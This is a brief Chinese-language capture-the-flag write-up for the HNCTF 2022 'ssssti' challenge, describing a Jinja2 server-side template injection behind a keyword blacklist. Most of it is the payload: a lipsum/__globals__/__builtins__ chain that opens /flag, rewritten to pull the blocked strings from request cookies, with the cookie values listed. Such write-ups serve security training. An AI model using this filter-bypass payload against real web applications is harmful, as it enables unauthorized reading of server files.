[HNCTF 2022 WEEK3]ssssti

很明显是模板注入，但是没有给参数，盲猜参数是name

---

黑名单

blacklist = ['\'', '"', 'args', 'os', '_']，不能用post方法
也不能用{%%}

但是还有一个可以用，request.cookies，可以通过cookies传入参数。

payload原型：

之前试了个我经常用的payload但是没成功，这次换一个。

{{self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open("/flag").read()}}

修改之后：

{{self[request.cookies.di][request.cookies.temp][request.cookies.lip][request.cookies.glo][request.cookies.bui].open(request.cookies.cmd).read()}}

di=__dict__;temp=_TemplateReference__context;lip=lipsum;glo=__globals__;bui=__builtins__;cmd=flag